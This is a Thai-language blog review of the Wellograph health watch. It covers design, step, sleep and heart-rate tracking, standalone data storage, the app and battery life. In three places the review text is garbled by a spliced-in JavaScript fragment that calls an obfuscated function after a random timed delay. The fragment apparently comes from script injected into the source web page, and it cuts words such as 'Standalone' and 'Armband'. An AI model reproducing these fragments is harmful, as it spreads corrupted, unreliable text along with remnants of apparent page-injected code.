ตลาดของสายรัดข้อมือและนาฬิกาเพื่อสุขภาพที่เป็น Activity Tracker นับวันจะเติบโตและมีผู้ใช้สนใจกันมากขึ้น ด้วยการที่มันตอบโจทย์ให้กับผู้ใช้ได้รู้ว่าตัวเองในแต่ละวันนั้นทำอะไรบ้างและมีผลต่อสุขภาพและการออกกำลังกายของตัวเองมากน้อยแค่ไหน
ส่วนใหญ่เราก็จะเป็นเป็นแบรนด์ของต่างประเทศหรือไม่ก็เป็นพวกของที่ผลิตในจีนไปเลย แต่ว่าจะมีอีกแบรนด์หนึ่งที่ขายทั่วโลก และมีการพัฒนาอุปกรณ์มาอย่างต่อเนื่อง แถมที่สำคัญเป็นงานพัฒนาโดยคนไทย นั่นก็คือ Wellograph
เราได้ตัว Wellograph มาทดสอบและใช้งาน มาดูกันดีกว่าว่าอุปกรณ์ที่พัฒนาโดยคนไทยตัวนี้จะมีอะไรที่น่าสนใจ และตอบโจทย์คนชอบออกกำลังกายและรักสุขภาพได้หรือไม่
ในกล่องมีอะไรมาให้บ้าง?
แพคเกจของ Wellograph นั้นแกะออกมาจะพบกับตัวนาฬิกาพร้อมสายหนัง ตัวที่เราได้มารีวิวนี้เป็นรุ่นใหม่ตัวเรือนเป็นสีขาวที่ดูสวยไปอีกแบบ มาพร้อมกับสายหนังแท้สีขาวเข้ากับตัวเรือน ในกล่องก็จะมีสาย microSD สำหรับเสียบกับแท่นชาร์จ ส่วนตัวชอบแท่นชาร์จของ Wellograph ที่เป็นแบบแท่นวางแม่เหล็กโดยที่เวลาชาร์จจะโชว์เป็นหน้าจอเวลาด้วย และเวลาในการชาร์จก็ประมาณ 1 ชั่วโมงก็เต็มแล้ว

วัสดุ+ดีไซน์แบบพรีเมี่ยม
จุดเด่นที่สัมผัสได้ตั้งแต่เปิดกล่องออกมาก็คือ ตัวเรือนของ Wellograph ที่ออกแบบมาให้ดูเรียบแต่ใช้วัสดุที่ดี โดยที่เคยได้รับรางวัน Innovations Design andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Engineering Award 2014 จากงาน CES 2014 เมื่อปีที่แล้ว
มาดูกันตั้งแต่ตัวหน้าปัดที่เป็นกระจกแบบ Sapphire มีทนต่อแรงขีดข่วนได้เป็นอย่างดี (เป็นกระจกแบบเดียวกันกับที่ Apple Watch ใช้ในรุ่น Edition) ส่วนตัวเรือนใช้วัสดุเป็นสแตนเลสและอลูมิเนียมที่มีความแข็งแรงแต่น้ำหนักเบา ส่วนตัวสายใช้วัสดุเป็นหนังแท้ที่สามารถถอดเปลี่ยนได้ ซึ่งก็มีให้เลือกซื้อมาเปลี่ยนได้ตามสไตล์ที่ชอบ
หน้าจอของ Wellograph จะเป็นแบบ Monochrome สีเดียวพร้อมไฟ backlit ส่องสว่างให้สามารถมองในที่มืดได้ และด้วยความที่เป็นจอแบบสีเดียวเวลาที่ออกแดดก็สามารถดูได้ชัดอยู่

คำสั่งเมนูต่างๆ
การเลือกคำสั่งและดูค่าต่างๆ จะเป็นการกดปุ่มที่ด้านข้าง ไม่ได้เป็นแบบจอสัมผัส โดยจะมีปุ่มกดตกลง และปุ่มเลื่อนเพื่อเลือก (ถ้ากด 2 ปุ่มพร้อมกันจะเป็นการ back ไปยังเมนูก่อนหน้า) ขนาดปุ่มใหญ่กดถนัดมือแต่อาจจะต้องออกแรงหน่อยเวลากด

เก็บข้อมูลการเคลื่อนไหวในแต่ละวัน
Wellograph ใช้ระบบการตรวจจับการเคลื่อนไหวด้วย Accelerometer แบบ 9 แกนที่มีความแม่นยำสูง ในเรื่องของการนับก้าวเดิน ในการทดสอบได้ลองใช้ควบคู่กับ Fitbit Charge HR ความคลาดเคลื่อนของจำนวนก้าวเดินแต่ละวันของ Wellograph จะต่างจากของ Fitbit ประมาณ 5-10% ซึ่งถือว่าไม่มาก โดยข้อมูลจำนวนก้าวเดินก็จะถูกบันทึกและนำมาประมวลผลเป็นค่าของแคลลอรี่ที่เผาผลาญในแต่ละวัน รวมกับการเผาผลาญโดยปกติของร่างกายตามวัย, น้ำหนัก, ส่วนสูง
สามารถใช้งานแบบ Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Alone ได้ ไม่ต้องเชื่อมต่อมือถือ บันทึกข้อมูลย้อนหลังได้ 40 วัน
เป็นจุดเด่นนึงที่น่าสนใจสำหรับ Wellograph ที่แตกต่างจาก Activity Tracker รุ่นอื่นๆ ในท้องตลาดคือ มันสามารถทำงานด้วยตัวของมันเองโดยไม่จำเป็นต้อง sync กับมือถือก็ได้ โดยสามารถดูข้อมูลสถิติย้อนหลังไปได้ถึง 40 วันจากบน Wellograph ได้เลย
ถือว่าสะดวกสำหรับคนที่ไม่อยากใช้งานร่วมกับมือถือ เพราะรุ่นอื่นๆ ส่วนใหญ่เต็มที่แล้วก็เก็บข้อมูลไว้ในอุปกรณ์ได้ประมาณ 6-15 วันเป็นอย่างมาก และไม่สามารถเปิดดูย้อนหลังจากในตัวอุปกรณ์เองได้ แต่ยังไง Wellograph เองก็สามารถใช้งานร่วมกับแอพบนมือถือได้ด้วยเช่นกัน สำหรับการอัพโหลดข้อมูลเก็บเอาไว้ในระบบเพื่อเปิดดูย้อนหลัง
บันทึกกิจกรรมการวิ่งได้
นอกจากใช้งานเพื่อเก็บการเคลื่อนไหวและก้าวเดินในแต่ละวันแล้ว ถ้าคุณชอบการออกกำลังกายด้วยการวิ่งแล้ว Wellograph มีคำสั่งกดบันทึกช่วงเวลาในการวิ่งออกกำลังกาย โดยจะมีการเก็บสถิติเฉพาะช่วงที่วิ่งเอาไว้ได้ด้วย เหมาะสำหรับคนที่ชอบวิ่งแล้วไม่อยากใช้แอพบนมือถือเป็นตัวเก็บข้อมูล เพราะแบบนั้นจะต้องเอามือถือใส่ Armbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and รัดกับแขนไปซึ่งอาจจะไม่ถนัด แต่บันทึกผ่านตัว Wellograph ก็ไม่ต้องพกมือถือไปด้วยก็ได้
ติดตามผลการนอนและความเครียดได้
เรื่องการเก็บผลคุณภาพของการนอนก็ถือว่าเป็นอีกมาตรฐานที่บรรดา Activity Tracker แทบทุกรุ่นมี ที่ดูได้ว่าในการนอนแต่ละคืนนั้นคุณหลับลึกหรือหลับตื้นแค่ไหน โดยที่ไม่จำเป็นต้องกดเริ่มในเวลาที่นอน นอกจากนี้ยังสามารถประเมินออกมาเป็นค่าความเครียดของคุณได้อีกด้วยว่าในแต่ละวันระดับความเครียดของคุณมีมากน้อยแค่ไหน เพื่อให้รู้ตัวและปรับเพิ่มเวลาในการพักผ่อนให้มากขึ้น
วัดอัตราการเต้นของหัวใจแบบ Real Time และแม่นยำ
Wellograph ติดตั้งตัวเซนเซอร์วัดอัตราการเต้นของหัวใจ (Heart Rate Sensor) มาที่ตัวเรือนด้วย และมีความพิเศษกว่ารุ่นอื่นๆ ตรงที่ใช้เป็นระบบไฟ LED แบบ 3 จุด ซึ่งมีความแม่นยำสูงกว่ารุ่นอื่นในท้องตลาดที่จะมีแต่แบบ 1 หรือ 2 จุดเท่านั้น

กันน้ำมาตรฐาน 5ATM
นั่นคือมาตรฐานที่สามารถกันน้ำได้ที่ระดับ 50 เมตร คือสามารถใส่อาบน้ำ ลุยฝน ทนเหงื่อ และใส่ว่ายน้ำได้ แต่ว่ายน้ำนี่ไม่ขอแนะนำเพราะว่าตัวนาฬิกาไม่ได้มีระบบตัวจับการเคลื่อนไหวในการว่ายน้ำ
ใช้งานร่วมกับสมาร์ทโฟนได้ทั้ง iOS, Android และ Windows Phone
Wellograph ถือเป็น Activity Tracker เพียงแค่ไม่กี่ตัวบนโลกนี้ที่รองรับการใช้งานด้วยการเชื่อมต่อกับสมาร์ทโฟนได้ทั้ง 3 ระบบ คือ iOS, Android และ Windows Phone และยังสามารถเชื่อมต่อข้อมูลเข้ากับ Google Fit (ในระบบของ Android) ได้อีกด้วย
ตัวแอพส่วนตัวแล้วในฐานะของคนที่ทำงานด้านออกแบบด้วย รู้สึกไม่ค่อยชอบหน้าตาของแอพสักเท่าไหร่นัก โดยเฉพาะตัวฟอนท์ภาษาอังกฤษที่เป็นแบบตัวบางแถมเล่นเป็นเส้นตวัด นอกจากจะอ่านยากแล้วยังทำให้รู้สึกว่ามันไม่ใช้แอพสำหรับสุขภาพหรือออกกำลังกาย
ส่วนเรื่องของการใช้งาน พื้นฐานแล้วจะเป็นตัวทำหน้าที่ดาวน์โหลดข้อมูลจากในตัว Wellograph แล้วอัพโหลดขึ้นไปเก็บไว้ใน Cloud จากนั้นก็ดึงข้อมูลสถิติทั้งหมดมาแสดงผล
นอกจากนี้ตัวแอพยังมีระบบ Social ที่เราสามารถแชร์ข้อมูลสถิติการเดินของเรากับเพื่อนๆ ที่ใช้ Wellograph ด้วยเหมือนกัน เพื่อจัดอันดับและเป็นการช่วยกระตุ้นให้เกิดการแข่งขันและอยากออกกำลังกายมากขึ้นด้วยอีกทาง
แบตเตอรี่ใช้งานต่อเนื่องได้นาน 5 วัน
ตามสเปคที่ระบุไว้ของ Wellograph นั้น แบตเตอรี่จะมีขนาด 210 mAh และใช้งานได้ 7 วัน จากที่ทดสอบใช้งานจริงแล้วจะอยู่ได้ประมาณ 4-5 วัน ซึ่งก็ถือว่าเป็นเวลาที่น่าพอใจเมื่อเทียบกับบรรดา Wearable หรือ Smart Watch ตัวอื่นที่มีหน้าจอเหมือนกัน
สรุปหลังการทดสอบใช้งาน
Wellograph ถือว่าเป็นนาฬิกาเพื่อสุขภาพที่ตอบโจทย์การใช้งานหลักพื้นฐานในการเป็น Activity Tracker ได้อย่างค่อนข้างครบถ้วนสมบูรณ์และแม่นยำ ทั้งเรื่องของก้าวเดิน, เวลาการนอนและคุณภาพของการนอน และสำหรับคนที่สนใจเรื่องของอัตราการเต้นของหัวใจตัวเซนเซอร์ของ Wellograph นั้นก็ทำงานได้น่าพึงพอใจพอสมควร รวมถึงตัวแบตเตอรี่ที่ใช้ต่อเนื่องได้หลายวัน ชาร์จไว และดูข้อมูลต่างๆ ได้ที่นาฬิกาเลยโดยไม่ต้องพึ่งแอพในโทรศัพท์เลยก็ได้
แต่ก็มีอีกหลายจุดที่อาจจะยังขัดหูขัดตาบ้างอย่างเช่น หน้าตาของแอพที่ดูยากและไม่ค่อยสวยงามนัก ส่วนตัวเรือนของ Wellograph ส่วนตัวแล้วถึงจะใช้วัสดุระดับเกรดพรีเมี่ยมและน้ำหนักเบา แต่มันก็เรือนหนาไปนิด ทำให้เวลาใส่อาจจะรู้สึกไม่ทะมัดทะแมง รวมถึงเวลาใส่นอนก็ไม่ค่อยจะสบายข้อมือเท่าที่ควร และตัวเรือนก็ยังมีขนาดที่ใหญ่ไปสำหรับผู้หญิงที่ข้อมือเล็ก
วัสดุสายที่เป็นหนังนั้น ถ้าสำหรับคนที่ออกกำลังกายหรือเหงื่อออกมากๆ นี่น่าจะมีปัญหาเพราะสายหนังนั้นมันอมเหงื่อไม่เหมือนกับสายพวกซิลิโคน (ซึ่ง Wellograph ไม่มีสายซิลิโคนแยกขาย) และยิ่งสายสีขาวนั้นจะเข้าสูตร “สวยตอนซื้อ” นั่นคือมีโอกาสที่มันจะดำและหมองได้ แล้วความสวยมันก็ลดน้อยลงไปด้วย
หวังว่าในอนาคต Wellograph จะทำรุ่นอื่นออกมาอีก (ปัจจุบันมีอยู่โมเดลเดียว) ซึ่งรุ่นปัจจุบันด้วยความที่ใช้วัสดุดีมาก ทำให้ราคาของมันอยู่ในระดับที่ค่อนข้างสูงมาก ถ้าหากมีรุ่นที่ใช้วัสดุที่ราคาถูกกว่านี้ ปรับปรุงดีไซน์ให้ดูสปอร์ตกว่านี้ น่าจะเป็นนาฬิกาเพื่อสุขภาพที่สมบูรณ์แบบมากยิ่งขึ้นกว่าเดิม
สำหรับคนที่สนใจอยากหาซื้อ Wellograph มาใช้ สามารถหาข้อมูลเพิ่มเติมในการสั่งซื้อสินค้าได้ที่ www.wellograph.com